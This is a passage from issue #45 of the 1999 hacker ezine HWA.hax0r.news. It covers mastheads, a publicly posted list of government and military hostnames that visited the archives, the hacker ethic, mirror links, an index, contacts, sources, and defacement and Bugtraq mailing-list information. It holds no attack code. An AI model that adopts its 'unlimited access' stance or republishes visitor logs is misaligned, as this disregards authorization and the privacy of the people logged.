[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99/2000=] Number 45 Volume 1 1999 Dec 5th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "This newsletter/ezine has been Declassified for the phearing impaired" ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ This is #45 covering Nov 28th to Dec 5th. ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Mailing list members: 447 Can we bump this up somewhat? spread the word! ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ | | | | ___ | |_ | |_| |/ _ \| __| | _ | (_) | |_ |_| |_|\___/ \__| _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ .gov and .mil activity proxy.gintic.gov.sg doegate.doe.gov sunspot.gsfc.nasa.gov gate1.mcbh.usmc.mil homer.nawcad.navy.mil maggie.nawcad.navy.mil lisa.nawcad.navy.mil msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov mc1926.mcclellan.af.mil kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good Is It Worth It Followup to see our boys keeping up with the news... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _ ___ ___ _ ___ | | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____ | |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __| | _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \ |_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _ _ _ _ _____ _ _ _ | | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___ | |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __| | _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__ |_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___| Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= _____ _ _ _ | ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _ | |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` | | _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| | |_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, | |___/ A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed BTW if anyone can suggest a better editor than UEDIT for this thing send me some email i'm finding it lacking in certain areas. Must be able to produce standard ascii. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= __ __ _ | \/ (_)_ __ _ __ ___ _ __ ___ | |\/| | | '__| '__/ _ \| '__/ __| | | | | | | | | | (_) | | \__ \ |_| |_|_|_| |_| \___/|_| |___/ New mirror sites *** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ *** http://datatwirl.intranova.net * NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. *** Most likely to be up to date other than the main site. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #44 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ************************************************************************** ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Eris Free Net #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on from the zine and around *** *** the zine or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Yes It Is (Worth It) ............................................ 04.0 .. ExplorerZip Shrinks, Becomes MiniZip ............................ 05.0 .. Staples Files Suit Against Unknown Defacer ...................... 06.0 .. Comet bows to consumer pressure.................................. 07.0 .. Personal Info of Canadian ISP Users Leaked ...................... 08.0 .. First Internet Piracy Case in Japan ............................. 09.0 .. FBI Launches InfraGuard in Ohio ................................. 10.0 .. National Gun Database Goes Online ............................... 11.0 .. Zero Knowledge Ships Freedom, Finally ........................... 12.0 .. OpenBSD 2.6 Ships ............................................... 13.0 .. Videon Was Warned of Data Loss .................................. 14.0 .. German Digital Signature Chip Broke ............................. 15.0 .. IETF Members Under Investigation For Treason .................... 16.0 .. Jane's Releases Cyberterrorism Report ........................... 17.0 .. Car Radio Listening Habits Being Gathered ....................... 18.0 .. CVE by Mitre Goes Online ........................................ 19.0 .. Novell Head Victim of Online Credit Card Theft .................. 20.0 .. IDC Says E-Commerce Unsafe Most of the Time ..................... 21.0 .. Attack Trees Help to Model Security Threats ..................... 22.0 .. Pandora Updated ................................................. 23.0 .. [sSh] Busted or Not? ........................................... 24.0 .. Response to Freedom Extraordinary ............................... 25.0 .. DCypher.net Team Created ........................................ 26.0 .. Hackers Make it to Mars ......................................... 27.0 .. Security Focus newsletter #17.................................... 28.0 .. SQL 7 "Magic Packet" DoS......................................... =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ ____ / ___| ___ _ _ _ __ ___ ___ ___ \___ \ / _ \| | | | '__/ __/ _ Y __| ___) | (_) | |_| | | | (_| __|__ \ |____/ \___/ \__,_|_| \___\___|___/ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ s News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ _ / ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___ \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __| ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \ |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- defaced GM [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -- defaced alpha [web page defacement announce list] This is a low traffic mail list to announce via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI. To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full 